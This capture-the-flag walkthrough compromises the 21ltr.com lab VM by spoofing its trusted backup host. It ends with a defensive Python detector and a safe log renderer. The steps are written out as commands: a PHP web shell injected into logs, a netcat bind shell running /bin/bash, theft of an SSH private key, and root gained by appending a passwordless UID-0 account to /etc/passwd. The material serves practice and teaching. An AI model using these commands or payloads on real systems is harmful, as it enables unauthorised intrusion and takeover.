#HackOnTuesday Episode 8 Hack remote servers using vulnerable trust relationships

After a long break, the #HackOnTuesday episodes are back! In today's episode we will hack the 21ltr.com CTF VM by first identifying the vulnerable trust relationship between the main VM and a backup system used by the VM, and then impersonating the backup system in order to exploit that trust relationship and compromise the 21ltr.com VM.

Tools, Scripts, and Exploits

» Identify all the hosts in the target network
   • nmap -sn 192.168.2.0/24
» Identify the services listening on the server.
   • nmap -v -Pn -sT 192.168.2.120 -p-
   • nmap -sV 192.168.2.120 -p 21,22,80
» Look for any vulnerable Web application
   • Open Firefox and go to http://192.168.2.120/
   • Open a new terminal and run dirbuster
      - cd 21ltr
      - clear
      - dirbuster # Use the wordlist at /usr/share/wordlists/directory-list-2.3-medium.txt
   • View source code on Firefox.
      - Hidden in the HTML source code there is a username and password!!
» Test whether the found credentials can be used to connect to either SSH or FTP.
   • ssh logs@192.168.2.120 # type the password
      - Login failed
   • ftp 192.168.2.120 # type username (e.g. logs) and password
      - Login successful
» Look for any interesting file in the FTP server.
   • ls
   • lcd /root/21ltr
   • get backup_log.php
   • quit
   • cat backup_log.php
      - Take note of the IP mentioned in the script.
» Find the correct path to backup_log.php
   • Go to http://192.168.2.120/backup_log.php # Page not found!
   • Go to http://192.168.2.120/logs/backup_log.php # Bingo!
» Change your IP to the one found in the backup_log.php script and look if there is any way to inject something in the logs.
   • ifconfig eth0 down
   • ifconfig eth0 192.168.2.240/24
   • ifconfig eth0 up
   • wireshark& # set the filter to ip.addr == 192.168.2.120
      - Apparently, every 5-10 minutes there is a connection attempt on port 10000.
» Learn more about the connection attempt on port 10000
   • nc -lvp 10000 > out.bin
   • file out.bin
   • mv out.bin out.gz
   • gunzip out.gz
   • file out
   • tar xvf out
   • ls -lFh
   • cd media/backup
   • tar xzvf pxelinux.cfg.tar.gz
» No interesting information seems to be contained in the pxelinux.cfg.tar.gz archive. However, after re-running nmap, I saw a new open port: port 10001. This port seemed to open only for a short period of time right after the backup archive is sent to us.
» Analyze the service on port 10001
   • nc -nlvp 10000 > data.tar.gz && nc -nv 192.168.2.120 10001
   • type ? help
   • Go to Firefox and refresh. Bingo! We have a way to inject something in the logs.
» Inject a PHP shell in the logs
   • type <?php echo exec($_GET["cmd"]);?>
   • Go to ?cmd=whereis nc
   • Go to ?cmd=whereis bash
   • Go to ?cmd=nc -nlvp 4444 -e /bin/bash
   • Open a new terminal and type nc -nv 192.168.2.120 4444
» Look for sensitive data
   • cat /etc/passwd
   • ls /home/jgreen
   • ls /home/hbeale
   • ls /tmp
   • cd /tmp
   • tar tvf backup.tar.gz # most likely the file we got from the server
   • ls /media
   • ls /media/backup # same file
   • cd /media/USB_1
   • ls -lFh
   • cd Stuff
   • ls -lFh
   • cd Keys
   • ls -lFh
   • cat id_rsa # Private key, but we don't know whose. Maybe root, maybe jgreen, or maybe hbeale.
» Use the private key to connect to the system.
   • Copy private key to a local file called key.
   • chmod 600 key
   • ssh -i key root@192.168.2.120 # Login failed
   • ssh -i key hbeale@192.168.2.120 # Login successful
» Escalate to root
   • List the allowed (and forbidden) commands for the invoking user.
      - sudo -l
   • Add an account with root privileges
      - sudo /usr/bin/cat >> /etc/passwd # Add gianni::0:0::/root:/bin/bash and then press enter and CTRL+C
   • su gianni
» Game Over!
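The root cause of the log-injection step above is that backup_log.php renders whatever the "trusted" backup peer writes over port 10001 as PHP instead of as text. The following added example (not part of the original episode or the 21ltr.com VM) shows the defender's side: a small detector that flags log entries carrying PHP or shell-execution code, and a safe renderer that escapes entries so a browser displays them as text. The log format and sample lines are constructed for the example.

```python
import html
import re

# Patterns that indicate server-side code was smuggled into log data.
# Constructed for this example; tune to the application's own log format.
SUSPICIOUS = re.compile(
    r"<\?(php|=)|\b(exec|system|shell_exec|passthru|eval)\s*\(|\$_(GET|POST|REQUEST)\b",
    re.IGNORECASE,
)


def is_injected(entry: str) -> bool:
    """Return True if a log entry looks like PHP/shell code rather than plain log text."""
    return SUSPICIOUS.search(entry) is not None


def scan_log(lines):
    """Return (line_number, entry) for every entry that trips the detector."""
    return [(n, line) for n, line in enumerate(lines, start=1) if is_injected(line)]


def render_entry(entry: str) -> str:
    """Safe rendering: escape the entry so a browser shows it as text.

    The fix on the server side is to read the log as data and escape it,
    never to include() or eval a file that a remote peer can write to.
    """
    return html.escape(entry, quote=True)


# Constructed sample log lines, mimicking what a backup peer could write
# over the trusted channel (IP-based trust, no authentication).
SAMPLE_LOG = [
    "2024-01-01 02:00:01 backup from 192.168.2.240 started",
    "2024-01-01 02:00:09 backup from 192.168.2.240 finished (1 archive)",
    '<?php echo exec($_GET["cmd"]);?>',
    "? help",
]

if __name__ == "__main__":
    for n, entry in scan_log(SAMPLE_LOG):
        print(f"line {n}: suspicious entry: {entry!r}")
    print(render_entry(SAMPLE_LOG[2]))
```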